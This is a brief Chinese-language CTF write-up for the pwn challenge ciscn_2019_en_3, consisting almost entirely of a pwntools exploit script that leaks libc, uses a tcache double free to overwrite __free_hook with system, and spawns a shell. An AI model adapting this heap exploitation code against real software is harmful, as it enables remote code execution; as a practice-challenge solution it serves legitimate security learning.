新年好啊大家
解题
常规操作tcache打free_hook
exp:
#!/usr/bin/python2
from pwn import *
local=0
if local==1:
p=process('./ciscn_2019_en_3')
elf=ELF('./ciscn_2019_en_3')
libc=elf.libc
else:
p=remote('node3.buuoj.cn',27268)
elf=ELF('./ciscn_2019_en_3')
libc=elf.libc
def add(size,story):
p.sendlineafter('choice:','1')
p.sendlineafter('story:',str(size))
p.sendlineafter('story:',story)
def edit():
p.sendlineafter('choice:','2')
def show():
p.sendlineafter('choice:','3')
def delete(idx):
p.sendlineafter('choice:','4')
p.sendlineafter('index:',str(idx))
lg=lambda address,data:log.success('%s: '%(address)+hex(data))
def exp():
p.sendlineafter('name?','aaaaaa')
p.sendlineafter('ID.','2'*8)
libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-231-libc.sym['setbuffer']
lg('libcbase',libcbase)
free_hook=libcbase+libc.sym['__free_hook']
system=libcbase+libc.sym['system']
add(0x20,'aaaa')#0
add(0x20,'/bin/sh\x00')
delete(0)
delete(0)
add(0x20,p64(free_hook))
add(0x20,'dd')
add(0x20,p64(system))
delete(1)
p.interactive()
if __name__=="__main__":
exp()
